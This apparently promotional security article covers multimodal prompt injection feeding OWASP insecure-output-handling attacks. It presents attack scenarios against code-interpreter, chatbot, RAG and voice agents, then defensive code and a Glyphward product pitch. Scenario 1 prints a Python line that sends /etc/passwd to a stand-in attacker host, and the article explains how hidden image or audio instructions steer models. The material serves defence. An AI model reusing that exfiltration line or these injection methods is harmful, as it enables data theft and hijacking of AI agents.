OWASP LLM02:2025 Insecure Output Handling — the multimodal-origin attack chain

The standard OWASP LLM02:2025 (Insecure Output Handling) playbook begins with a user typing a malicious prompt. In a multimodal application, the prompt never has to be typed: an instruction hidden in an uploaded image or audio file reaches the vision or audio model, the model's output becomes the attack payload, and that payload flows into a downstream code interpreter, web renderer, or database without the output sanitizer ever seeing the root cause. This is the LLM01→LLM02 chain. An output-only control catches some harm at the end of the chain, but it cannot break the chain at the start. Here is what LLM02:2025 names, where multimodal inputs create LLM02 exposure that a text-only program misses, and the two-control architecture — input inspection and output sanitization — that closes both risks together.

TL;DR

LLM02:2025 (canonical risk page at the OWASP GenAI Security Project) covers the class of vulnerabilities where LLM-generated output is consumed by a downstream component — a code interpreter, a web renderer, an API, a shell — without sanitization or validation. In multimodal apps, the payload that reaches the downstream component can originate in an image or audio file rather than a typed prompt. A text-only output sanitizer sees the same poisoned code or markup either way; it does not know the taint came from pixels. Breaking the chain before the poisoned output is generated — by scanning the image or audio bytes before they reach the model — is the structural answer. Glyphward is the inference-time multimodal scanner that sits at that boundary and blocks the tainted input so no poisoned output is ever produced for a downstream component to execute.

What LLM02:2025 actually covers

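LLM02:2025 takes its name from the class of downstream-execution vulnerabilities that exist when an application passes LLM output to another system without treating that output as untrusted. (A note on numbering: in the published 2025 list this risk is catalogued as LLM05:2025 Improper Output Handling; Insecure Output Handling was the LLM02 entry in the earlier list.) The 2025 revision of the OWASP Top 10 for LLM Applications identifies several categories of downstream harm: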

Cross-site scripting (XSS). LLM output is rendered as HTML in a web interface. A user who can influence the model's output can inject JavaScript that executes in another user's browser. The attack is structurally identical to classic stored XSS — the novelty is that the storage mechanism is the model rather than a database.
Remote code execution (RCE). LLM output is executed as code — typically in a code-interpreter agent where the model generates Python, Bash, or JavaScript that a REPL then runs. An injected instruction in the model's context can redirect the generated code to read secrets, exfiltrate data, or modify files.
Server-side request forgery (SSRF). LLM output contains a URL that a downstream component fetches. An injected instruction can redirect that URL to an internal endpoint, a cloud metadata service, or an exfiltration target.
Privilege escalation via structured output. LLM output is parsed as JSON or XML and used to populate database queries, function calls, or API requests. An injected instruction can add fields, modify values, or escalate permissions inside the downstream system's data model.

The 2025 list names these scenarios because code-interpreter agents, agentic pipelines that render LLM output in web views, and structured-output-to-API patterns are now mainstream in production AI applications. The control the list calls for is sanitization and validation of every LLM output before it reaches a downstream executor — not trust that the model's output is safe because the model's input was user-supplied text.
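As a minimal sketch of what "treat every output as untrusted" can look like at two of these sinks, the Python below escapes model output before it is placed in HTML and refuses to fetch a model-supplied URL unless its host is on an allowlist. The function names and the ALLOWED_HOSTS entry are illustrative assumptions, not part of the OWASP text or of any product API.

```python
import html
import ipaddress
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts this application may fetch from.
ALLOWED_HOSTS = {"api.example.com"}


def render_safe(llm_output: str) -> str:
    """Escape model output so a browser displays it as text, not markup."""
    return html.escape(llm_output, quote=True)


def is_fetchable(url: str) -> bool:
    """Allow only https URLs whose hostname is explicitly allowlisted."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname is None:
        return False
    try:
        # Literal IP addresses (for example a cloud metadata endpoint)
        # are rejected outright rather than compared to the allowlist.
        ipaddress.ip_address(parsed.hostname)
        return False
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    return parsed.hostname in ALLOWED_HOSTS
```

Under these assumptions, render_safe turns a <script> tag into inert text and is_fetchable rejects a metadata-service address. The sketch does not handle redirects or DNS rebinding, which a production SSRF control would also need to consider.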

Where multimodal inputs create LLM02 exposure

The standard LLM02 framing assumes the attack begins at the text input boundary: a user or an external source crafts a prompt that steers the model into producing harmful output. In multimodal applications, that assumption is wrong. The attack can begin at the image or audio boundary instead.

The chain works in two stages. Stage one is LLM01 multimodal: an instruction is hidden inside image pixels or an audio waveform, for example a FigStep-style adversarial-glyph overlay, an AgentTypo confusable-character block, a WhisperInject ultrasonic carrier, or an image that arrives indirectly through a retrieved document (see FigStep detection, AgentTypo detector, WhisperInject detection, indirect prompt injection in images). The vision or audio model reads those bytes as part of the context and follows the embedded instruction. Stage two is LLM02: the model's output, now shaped by the injected instruction, flows to a downstream component that executes it. That component is not the model itself; it is the code interpreter, the markdown renderer, the structured-output parser, or the API adapter that consumes the model's output.

What makes this chain dangerous for a standard LLM02 control program is that the output sanitizer observes the same output regardless of whether the taint came from a typed user prompt or from pixels in an uploaded image. The output sanitizer cannot close the chain at its root. It can catch some terminal harm — rejecting a generated rm -rf command before the shell runs it, stripping a <script> tag before the browser renders it — but it cannot prevent the model from having generated the payload in the first place. The only structural closure is at stage one: scan the image or audio bytes before they reach the model, so no poisoned output is ever produced for the downstream component to process.
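The stage-one closure described above can be sketched as a gate that runs before the model call. This is a sketch under stated assumptions: scan and call_model are hypothetical callables supplied by the application, the threshold value is arbitrary, and the only behaviour taken from the text is that a payload scoring above the threshold never reaches the model.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class GateDecision:
    allowed: bool
    score: int


def gate_attachment(
    payload: bytes,
    scan: Callable[[bytes], int],  # hypothetical scanner: bytes -> 0..100 score
    threshold: int = 50,           # illustrative value, not a recommendation
) -> GateDecision:
    """Score the raw bytes and reject anything above the threshold."""
    score = scan(payload)
    return GateDecision(allowed=score <= threshold, score=score)


def answer_with_attachment(
    payload: bytes,
    prompt: str,
    scan: Callable[[bytes], int],
    call_model: Callable[[str, bytes], str],  # hypothetical model client
) -> Optional[str]:
    """Call the model only if the attachment passes the stage-one gate."""
    decision = gate_attachment(payload, scan)
    if not decision.allowed:
        # The model never sees the bytes, so no output is generated
        # for a downstream executor to receive.
        return None
    return call_model(prompt, payload)
```

The design point is ordering: the scan happens on the bytes, before any model inference, so a rejected attachment produces no output at all.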

Four multimodal-origin LLM02 attack scenarios

Four attack patterns recur in the multimodal LLM02 threat model across production application categories.

1. Code-interpreter agent with image input. The application lets users upload screenshots or charts for analysis; the model reads the image and then generates Python that the code interpreter runs. A FigStep-style overlay on the uploaded image instructs the model to include a data-exfiltration line in its generated code, such as import urllib.request; urllib.request.urlopen('https://attacker.example/?' + open('/etc/passwd').read()). The user's visible output is a normal-looking analysis; the exfiltration runs silently in the REPL. An output sanitizer that validates generated Python can catch this specific form if it pattern-matches the exfiltration URL or the system-file path. But the model can express an equivalent payload in many syntactic variations, which turns signature-based output filtering into an arms race. Closing stage one, by rejecting the FigStep-bearing image before it reaches the model, prevents the tainted Python from being generated at all. Per-product threat model in screenshot-reading agents, CrewAI agents, and AutoGen agents.

2. Multimodal chatbot with markdown rendering. The application renders LLM output as HTML in a chat interface, and users can upload images in conversation. An adversarial image instructs the model to output a markdown link or image reference that, when rendered, loads an attacker-controlled resource or triggers a JavaScript handler. The impact is that of classic stored XSS (session token theft, CSRF, UI redirection), delivered through the vision channel. An output sanitizer that strips <script> tags, combined with an enforced Content Security Policy, catches the terminal step for most delivery forms. But a sandboxed rendering environment plus output sanitization is a significantly more complex control to maintain than scanning the image at upload time. Per-product threat model in chatbots with image upload.

3. RAG pipeline with image-bearing PDFs. A document retrieval pipeline ingests PDFs and passes retrieved chunks to the model. A PDF with an embedded image carries a FigStep or indirect-injection payload: an instruction to include a specific URL in the model's synthesized answer, or to populate a structured-output field with an attacker-specified value. If the model's answer feeds a downstream API call or a database write, the injected field value takes effect with the application's permissions. An output sanitizer on the API call can validate schema conformance, but that does not help when the schema is wide enough to admit a privilege-escalating value (a role override, a quota increase, an admin flag). Stage-one closure, scanning images extracted from PDFs at ingestion or retrieval time, prevents the poisoned chunk from ever reaching the model. Per-product threat model in RAG pipelines.

4. Voice agent with code generation or tool dispatch. The application transcribes audio, passes the transcript to an LLM, and uses the model's response to dispatch tool calls or generate configuration. A WhisperInject-class payload in the audio instructs the model to add a tool call not requested by the user — a calendar write to an attacker-controlled time slot, an API call to an exfiltration endpoint, a configuration change that persists across sessions. The transcript that reaches the text-side guard is clean (Whisper dropped the carrier); the model's output contains the injected tool call. Per-product threat model in voice agents; byte-level coverage in audio prompt-injection detection.
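Scenario 3 turns on how wide the downstream schema is. As an illustration only, the sketch below validates a model-produced update against a deliberately tight schema that rejects unexpected fields such as a role override. The ticket-update shape, field names, and allowed priorities are invented for the example and do not come from any real API.

```python
# Hypothetical schema for a model-produced "ticket update" payload.
ALLOWED_FIELDS = {"ticket_id": str, "summary": str, "priority": str}
ALLOWED_PRIORITIES = {"low", "normal", "high"}


def validate_ticket_update(payload: dict) -> dict:
    """Return a copy of the payload if it matches the schema exactly.

    Raises ValueError on unexpected fields, missing fields, wrong types,
    or a priority outside the allowed set.
    """
    unexpected = set(payload) - set(ALLOWED_FIELDS)
    if unexpected:
        # Extra keys (for example "role" or "is_admin") are rejected,
        # not silently ignored or passed through.
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")

    missing = set(ALLOWED_FIELDS) - set(payload)
    if missing:
        raise ValueError(f"missing fields: {sorted(missing)}")

    for name, expected_type in ALLOWED_FIELDS.items():
        if not isinstance(payload[name], expected_type):
            raise ValueError(f"field {name!r} has the wrong type")

    if payload["priority"] not in ALLOWED_PRIORITIES:
        raise ValueError("priority is outside the allowed set")

    return dict(payload)
```

A tight schema narrows what an injected instruction can achieve at the API boundary, but it still runs after the model has produced the tainted value, which is why it complements input scanning and does not replace it.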

Why text output filters do not close the multimodal-origin chain

Three architectural facts explain why output sanitization is necessary but not sufficient for multimodal-origin LLM02.

Position in the pipeline. An output sanitizer sits after the model. It processes the model's response before a downstream component executes it. That position is correct and useful — it is the last line of defence before real harm occurs. But it cannot see why the model produced that particular output. A rm -rf command in generated code looks identical whether the model was steered there by a typed jailbreak, a FigStep overlay in an uploaded image, or an indirect injection in a retrieved PDF. The sanitizer treats all three the same. It catches the terminal form of the attack but cannot prevent the model from generating the next syntactic variant.
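To make the "next syntactic variant" point concrete, here is a small sketch of an output-side check built on Python's standard ast module. It flags generated code by structure (imports of network modules, calls to selected built-ins) and not by string signature. The deny-lists are illustrative assumptions, and the check is deliberately incomplete.

```python
import ast

# Illustrative deny-lists, not an exhaustive policy.
NETWORK_MODULES = {"urllib", "http", "socket", "requests", "ftplib", "smtplib"}
BLOCKED_CALLS = {"open", "exec", "eval", "__import__"}


def find_violations(source: str) -> list[str]:
    """Return human-readable findings for generated Python source."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable source"]

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"import {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            # node.module is None for "from . import x"
            if node.module and node.module.split(".")[0] in NETWORK_MODULES:
                findings.append(f"from {node.module} import ...")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            # Only direct calls by name are seen; aliased or attribute-based
            # access to the same built-ins is not caught here.
            if node.func.id in BLOCKED_CALLS:
                findings.append(f"call {node.func.id}()")
    return findings
```

A structural check like this survives renamed URLs and reordered statements, but indirection (aliasing a built-in, building a module name at runtime) still slips past it. That residual gap is the reason the text pairs output checks with sandboxed execution and with stage-one input scanning.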

The OCR adapter problem. One mitigation for image inputs is to run OCR on every uploaded image and pass the OCR transcript through the text-side filter as if it were typed input. This does not close the multimodal-origin LLM02 chain for the same reason it does not close LLM01 multimodal: FigStep, AgentTypo, and the adversarial-glyph class are specifically designed to evade OCR-based filtering. The pixels contain an instruction the vision model reads; the OCR transcript does not contain that instruction; the text-side filter sees nothing suspicious. See why every text-only scanner misses a 30-pixel PNG for the full architectural argument. The same structural ceiling applies when the OCR adapter is feeding an output filter rather than an input filter.

Indirect vectors skip text inspection entirely. In a RAG pipeline or an MCP-connected agent, the image or audio bytes arrive through a retrieval, a tool result, or an embedded resource — not through a direct user upload. The user's initial message may be benign and entirely clean on both text-side input and output filters. The taint enters through the non-text channel (see MCP servers and RAG pipelines). Neither the text-side input filter nor the text-side output filter has a chance to observe the payload before it reaches the model.
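For the indirect path, the bytes have to be pulled out of the tool result before they can be scanned. The sketch below assumes tool results arrive as a list of MCP-style content blocks, where image and audio blocks carry a type, base64-encoded data, and a mimeType. The function name is hypothetical, and embedded resources or linked URLs would need their own handling.

```python
import base64

# Content block types that carry binary payloads worth scanning.
BINARY_BLOCK_TYPES = {"image", "audio"}


def extract_binary_payloads(content_blocks: list[dict]) -> list[tuple[str, bytes]]:
    """Collect (mime_type, raw_bytes) for every image or audio block.

    Text blocks are skipped here because they go through the text-side
    filters; this function only feeds the multimodal scanner.
    """
    payloads = []
    for block in content_blocks:
        if block.get("type") in BINARY_BLOCK_TYPES and "data" in block:
            mime_type = block.get("mimeType", "application/octet-stream")
            payloads.append((mime_type, base64.b64decode(block["data"])))
    return payloads
```

Each returned payload would then be scored before the tool result is appended to the model's context, which gives the indirect channel the same stage-one check as a direct upload.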

Coverage matrix — LLM02 multimodal evidence

For a buyer building an LLM02:2025 control program that accounts for multimodal-origin attack paths, the question is which tools address each layer. The table below separates input-side multimodal coverage (stage one — prevents poisoned output from being generated) from output-side sanitization (stage two — catches terminal harm before downstream execution).

Tool	Input-side multimodal scan	Output-side text sanitization	LLM02 multimodal-origin coverage
Lakera Guard	No (text-only input guard)	Yes (output scanner available)	Stage 2 only — multimodal-origin chain not broken at root
LLM Guard (OSS)	No (text-only by design)	Yes (output scanners in OSS library)	Stage 2 only — multimodal-origin chain not broken at root
Azure Prompt Shields	Image moderation, not PI	Yes (Azure Content Safety output filters)	Stage 2 only; image moderation ≠ PI detection on input
Promptfoo	Eval-time test harness	Eval-time test harness	Neither stage at inference time — CI/eval tool, not runtime control
Glyphward	Yes — image + audio bytes, inference-time	Not in scope (pair with text-side output filter)	Stage 1 — breaks the chain before poisoned output is generated

The operative takeaway is that Glyphward and a text-side output sanitizer are complements, not substitutes. LLM02 needs both: the multimodal input scanner closes the root-cause path, and the output sanitizer catches any residual harm that reaches the downstream boundary — whether from text-side injection or from a multimodal-origin payload that evaded the input scanner (e.g., a novel attack class not yet in the corpus). No single tool closes both stages unilaterally. The comparison detail is in Glyphward vs Lakera Guard, vs LLM Guard, vs Azure Prompt Shields, and vs Promptfoo.

The two-control architecture for LLM01+LLM02 compliance

Closing LLM02:2025 in a multimodal application requires two controls positioned at two different pipeline boundaries. Neither replaces the other; they address different stages of the same attack chain.

Stage-one: multimodal input inspection. Place the scanner on every boundary at which image or audio bytes enter the model's context — the upload handler before the vision API call, the audio buffer before the STT pipeline, the loader middleware before RAG ingestion, the tool-result handler before MCP content blocks reach the LLM host. Score each byte payload against the PI detection corpus. Reject or quarantine payloads above the threshold before they reach the model. This prevents any poisoned output from being generated; there is nothing for a downstream executor to receive. Per-framework mount points in LangChain, CrewAI, AutoGen, OpenAI Assistants API, RAG pipelines, and MCP servers.
Stage-two: output sanitization before downstream execution. Validate and sanitize every LLM output before passing it to a code interpreter, a web renderer, an API client, or a data store. This is the standard LLM02 control: treat the model's response as untrusted user input at every downstream boundary. For code execution, run the generated code through a static analyser or execute in a sandboxed environment with no network or filesystem access. For web rendering, enforce a strict CSP and strip all raw HTML from markdown output. For structured-output-to-API flows, validate the output against a tight schema that rejects unexpected fields and values. For database writes, use parameterised queries regardless of the LLM output's apparent structure.
Source-aware trust thresholds. Apply lower (stricter) rejection thresholds to content that arrives from less-trusted sources: third-party tool results, public-web retrievals, community-contributed documents. An image byte stream from a first-party internal document warrants a different risk posture than the same bytes arriving from an untrusted URL in an MCP server's tool response. Source-aware thresholds let the control program express these risk tiers without blocking first-party content unnecessarily.
Per-request scoring for evidence. Both controls should produce per-request evidence: the multimodal scanner returns a request ID and a 0–100 score; the output sanitizer logs every rejection and the downstream component it protected. LLM02:2025 audit evidence is a claim about pipeline integrity across all execution paths — not just the happy path — and per-request logs are the only way to demonstrate coverage at scale. The OWASP LLM01 and LLM02 evidence questions are typically asked together in an audit; the combined log answers both from a single evidence trail.
Ongoing testing. Add multimodal PI payloads to your CI eval suite (see Promptfoo + multimodal scanning). A red-team run against each modality the application accepts (direct image upload, audio input, and every indirect channel) verifies that the stage-one scanner catches the current corpus and that the stage-two sanitizer rejects the outputs the model produces when the scanner is disabled. Toggling each stage on and off independently gives four test configurations (both on, scanner only, sanitizer only, neither); the failure modes of each combination map directly onto the OWASP LLM02 evidence question structure.
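The source-aware thresholds, per-request evidence, and test matrix from the list above could be wired together roughly as follows. This is a sketch: the source labels, threshold numbers, and log field names are assumptions chosen for illustration, and a lower threshold means a stricter policy because payloads scoring above it are rejected.

```python
import itertools
import json

# Hypothetical per-source rejection thresholds on the 0-100 score.
THRESHOLDS = {"first_party": 70, "user_upload": 50, "third_party_tool": 30}
DEFAULT_THRESHOLD = 30  # unknown sources get the strictest tier


def is_allowed(score: int, source: str) -> bool:
    """Allow a payload only if its score does not exceed the source's threshold."""
    return score <= THRESHOLDS.get(source, DEFAULT_THRESHOLD)


def evidence_record(request_id: str, source: str, score: int) -> str:
    """Build one JSON log line per scanned payload for audit evidence."""
    return json.dumps(
        {
            "request_id": request_id,
            "source": source,
            "score": score,
            "threshold": THRESHOLDS.get(source, DEFAULT_THRESHOLD),
            "allowed": is_allowed(score, source),
        },
        sort_keys=True,
    )


# Every (scanner_enabled, sanitizer_enabled) combination for red-team runs.
TEST_CONFIGS = list(itertools.product((True, False), repeat=2))
```

The same score of 40 passes for a first-party document and is rejected for a third-party tool result under these example tiers, and each decision leaves a log line that can be joined to the output sanitizer's own rejections by request ID.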

How Glyphward closes stage one

Glyphward is the inference-time multimodal scanner — bytes in, 0–100 score and flagged region out — that sits at the stage-one boundary described above. The HTTP contract is one POST per attachment: image bytes or URL, or audio bytes; the response is a score, the flagged region (bounding box for images, time window for audio), the modality-tagged reason, and a request ID. The scanner runs CLIP embedding plus a typographic-PI detection head plus Tesseract OCR cross-referenced against a curated payload corpus on the image side, and a waveform anomaly classifier plus Whisper-small transcript filter on the audio side. Full architecture in the multimodal prompt-injection threat model for AI product teams (2026).
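On the client side, the response described above might be handled with a small typed parser like the one below. The text only states what the response contains (score, flagged region, modality-tagged reason, request ID); the JSON key names and the shape of the region object used here are assumptions for illustration and are not taken from the documented API.

```python
import json
from dataclasses import dataclass
from typing import Optional


@dataclass
class ScanResult:
    request_id: str
    score: int               # 0-100, higher means more likely injection
    reason: str              # modality-tagged reason string
    region: Optional[dict]   # bounding box or time window, if anything was flagged


def parse_scan_response(body: str) -> ScanResult:
    """Parse a scan response body; key names are assumed, not documented."""
    data = json.loads(body)
    score = int(data["score"])
    if not 0 <= score <= 100:
        # Fail closed on a malformed score so it cannot be mistaken for "clean".
        raise ValueError(f"score out of range: {score}")
    return ScanResult(
        request_id=str(data["request_id"]),
        score=score,
        reason=str(data.get("reason", "")),
        region=data.get("region"),
    )
```

Validating the score range on receipt keeps a malformed or truncated response from being treated as a pass, and keeping the request ID on the result object makes it easy to attach to the audit log.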

For an LLM02:2025 audit the scanner addresses the multimodal-origin gap: the stage-one scores, request IDs, and flagged-region reasons constitute the evidence that multimodal inputs are inspected before they reach any model that produces downstream-executed output. That evidence answers the implicit question behind every LLM02 audit item — "what controls prevent the model from generating a harmful payload from a non-text input?" — in the same way the text-side input guard answers the same question for text inputs.

Glyphward does not replace an output sanitizer — it pairs with one. The OWASP LLM01:2025 multimodal coverage page covers the input-side control in detail. The output-side control belongs to the same text-PI vendor family (Lakera, LLM Guard, Azure) most teams already use for text inputs; Glyphward is the missing half, not a replacement for the half that already exists. Pricing is flat-rate self-serve at $29/mo Pro and $99/mo Team, with a free tier for prototyping via the free-tier API.
